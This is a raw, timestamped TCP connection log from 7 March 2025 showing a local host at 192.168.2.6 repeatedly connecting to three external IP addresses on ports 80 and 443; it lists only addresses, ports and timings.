Mar 7, 2025 22:34:08.111855030 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.111896038 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.111901999 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.111942053 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.115545034 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.115582943 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.115678072 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.115720987 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.116668940 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.116708040 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.116714001 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.116750002 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.119082928 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.119132042 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.119138002 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.119177103 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.119184971 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.119221926 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.121238947 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.121282101 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.121340036 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.121515036 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.131815910 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.131860018 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.131881952 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.131921053 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.136975050 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.137017012 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.137022972 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.137061119 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.138027906 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.139884949 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.139889956 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.139940977 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.142858028 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.142901897 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.142915964 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.142955065 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.143937111 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.143975973 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.143981934 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.144021034 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.156254053 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.156323910 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.156330109 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.156368971 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.163851023 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.163902998 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.163911104 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.163950920 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.164033890 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.164109945 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.165633917 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.165683031 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.165759087 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.165797949 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.167714119 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.167763948 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.167839050 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.167876005 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.171286106 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.171335936 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.171343088 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.171385050 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.176043034 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.176100016 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.176100016 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.176110029 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.176137924 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.176191092 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.195637941 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.195688009 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.195719004 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.195754051 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.195766926 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.195790052 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.195838928 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.195843935 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.195879936 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.195879936 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.195892096 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.195919037 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.195952892 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.195956945 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.195997953 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.199774981 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.199829102 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.200007915 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.200046062 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.200130939 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.200169086 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.203393936 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.203452110 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.221908092 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.221988916 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.221996069 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.222040892 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.223592043 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.223637104 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.223643064 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.223683119 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.224986076 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.225029945 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.225034952 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.225075006 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.226172924 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.226217031 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.226222038 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.226265907 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.227854967 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.227895975 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.227900982 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.227941990 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.229497910 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.229540110 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.229546070 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.229583025 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.229588985 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.229625940 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.231122017 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.231161118 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.232320070 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.232358932 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.232364893 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.232402086 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.244505882 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.244568110 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.244577885 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.244621038 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.244968891 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.245008945 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.245073080 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.245109081 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.246907949 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.246963978 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.246970892 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.247011900 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.248585939 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.248626947 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.248632908 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.248672009 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.250057936 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.250094891 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.250101089 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.250139952 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.251585007 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.251627922 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.251633883 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.251674891 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.253726959 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.253802061 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.253807068 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.253849030 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.267294884 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.267381907 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.267386913 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.267426014 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.270411015 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.270458937 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.270466089 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.270498991 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.288351059 CET	49691	443	192.168.2.6	142.250.184.225
Mar 7, 2025 22:34:08.288371086 CET	443	49691	142.250.184.225	192.168.2.6
Mar 7, 2025 22:34:08.545351028 CET	49692	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:08.550474882 CET	80	49692	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:08.550626993 CET	49692	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:08.551006079 CET	49692	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:08.556127071 CET	80	49692	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:09.575577974 CET	80	49692	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:09.580261946 CET	49692	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:09.585623026 CET	80	49692	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:09.867343903 CET	80	49692	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:09.914139986 CET	49692	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:10.158878088 CET	49693	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:10.158941984 CET	443	49693	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:10.159027100 CET	49693	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:10.160708904 CET	49693	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:10.160742998 CET	443	49693	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:12.020862103 CET	443	49693	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:12.020958900 CET	49693	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:12.027534008 CET	49693	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:12.027565956 CET	443	49693	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:12.027879953 CET	443	49693	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:12.031734943 CET	49693	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:12.072369099 CET	443	49693	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:12.573399067 CET	443	49693	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:12.596118927 CET	443	49693	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:12.596204996 CET	49693	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:12.626252890 CET	49693	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:12.631748915 CET	49692	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:12.636935949 CET	80	49692	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:12.894737959 CET	80	49692	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:12.897380114 CET	49694	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:12.897489071 CET	443	49694	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:12.897603035 CET	49694	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:12.897917032 CET	49694	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:12.897953033 CET	443	49694	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:12.945456982 CET	49692	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:14.713618040 CET	443	49694	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:14.715357065 CET	49694	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:14.715384007 CET	443	49694	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:15.221146107 CET	443	49694	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:15.221245050 CET	443	49694	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:15.221385002 CET	49694	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:15.221931934 CET	49694	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:15.225395918 CET	49692	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:15.226562977 CET	49695	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:15.230694056 CET	80	49692	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:15.230768919 CET	49692	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:15.231698036 CET	80	49695	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:15.231777906 CET	49695	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:15.231863022 CET	49695	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:15.236830950 CET	80	49695	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:16.033478975 CET	80	49695	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:16.034991980 CET	49696	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:16.035084009 CET	443	49696	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:16.035175085 CET	49696	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:16.035459042 CET	49696	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:16.035489082 CET	443	49696	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:16.086329937 CET	49695	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:17.797513008 CET	443	49696	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:17.799479008 CET	49696	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:17.799515009 CET	443	49696	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:18.322407961 CET	443	49696	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:18.322482109 CET	443	49696	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:18.322669983 CET	49696	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:18.323184967 CET	49696	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:18.328200102 CET	49697	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:18.333259106 CET	80	49697	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:18.333403111 CET	49697	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:18.333512068 CET	49697	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:18.338541031 CET	80	49697	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:20.143603086 CET	80	49697	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:20.145134926 CET	49698	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:20.145236969 CET	443	49698	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:20.145360947 CET	49698	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:20.145629883 CET	49698	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:20.145661116 CET	443	49698	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:20.195055008 CET	80	49697	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:20.195250988 CET	49697	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:21.893757105 CET	443	49698	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:21.895849943 CET	49698	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:21.895934105 CET	443	49698	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:22.502367020 CET	443	49698	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:22.526422977 CET	443	49698	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:22.526634932 CET	49698	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:22.526998997 CET	49698	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:22.530405045 CET	49697	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:22.531433105 CET	49699	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:22.535918951 CET	80	49697	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:22.536034107 CET	49697	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:22.536515951 CET	80	49699	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:22.536693096 CET	49699	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:22.536823988 CET	49699	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:22.541889906 CET	80	49699	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:23.757919073 CET	80	49699	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:23.759421110 CET	49700	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:23.759460926 CET	443	49700	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:23.759562016 CET	49700	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:23.759866953 CET	49700	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:23.759876013 CET	443	49700	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:23.804847956 CET	49699	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:25.584412098 CET	443	49700	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:25.586283922 CET	49700	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:25.586316109 CET	443	49700	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:26.098004103 CET	443	49700	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:26.098077059 CET	443	49700	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:26.098135948 CET	49700	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:26.098663092 CET	49700	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:26.102751017 CET	49699	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:26.103693008 CET	49701	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:26.108107090 CET	80	49699	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:26.108160973 CET	49699	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:26.108951092 CET	80	49701	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:26.109072924 CET	49701	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:26.109200954 CET	49701	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:26.114975929 CET	80	49701	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:26.938072920 CET	80	49701	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:26.941529989 CET	49702	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:26.941587925 CET	443	49702	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:26.941672087 CET	49702	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:26.950265884 CET	49702	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:26.950280905 CET	443	49702	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:26.992322922 CET	49701	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:28.704811096 CET	443	49702	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:28.706414938 CET	49702	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:28.706444025 CET	443	49702	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:29.193491936 CET	443	49702	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:29.211304903 CET	443	49702	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:29.211388111 CET	49702	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:29.211764097 CET	49702	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:29.215697050 CET	49701	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:29.216325998 CET	49703	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:29.221013069 CET	80	49701	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:29.221118927 CET	49701	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:29.221515894 CET	80	49703	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:29.221582890 CET	49703	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:29.221678019 CET	49703	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:29.226646900 CET	80	49703	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:30.023307085 CET	80	49703	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:30.027821064 CET	49704	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:30.027875900 CET	443	49704	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:30.027945042 CET	49704	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:30.028230906 CET	49704	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:30.028244019 CET	443	49704	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:30.070506096 CET	49703	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:31.747114897 CET	443	49704	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:31.748802900 CET	49704	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:31.748833895 CET	443	49704	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:32.251244068 CET	443	49704	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:32.251318932 CET	443	49704	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:32.251454115 CET	49704	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:32.251929045 CET	49704	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:32.255491018 CET	49703	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:32.256047964 CET	49705	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:32.261158943 CET	80	49703	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:32.261174917 CET	80	49705	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:32.261249065 CET	49703	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:32.261277914 CET	49705	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:32.261429071 CET	49705	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:32.266458035 CET	80	49705	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:33.047346115 CET	80	49705	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:33.048687935 CET	49706	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:33.048727989 CET	443	49706	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:33.048805952 CET	49706	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:33.049077988 CET	49706	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:33.049086094 CET	443	49706	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:33.101726055 CET	49705	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:35.056998968 CET	443	49706	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:35.058684111 CET	49706	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:35.058712006 CET	443	49706	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:35.639877081 CET	443	49706	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:35.640052080 CET	443	49706	104.21.16.1	192.168.2.6
Mar 7, 2025 22:34:35.640103102 CET	49706	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:35.640542984 CET	49706	443	192.168.2.6	104.21.16.1
Mar 7, 2025 22:34:35.646898985 CET	49705	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:35.647496939 CET	49707	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:35.652096033 CET	80	49705	132.226.8.169	192.168.2.6
Mar 7, 2025 22:34:35.652146101 CET	49705	80	192.168.2.6	132.226.8.169
Mar 7, 2025 22:34:35.652460098 CET	80	49707	132.226.8.169	192.168.2.6
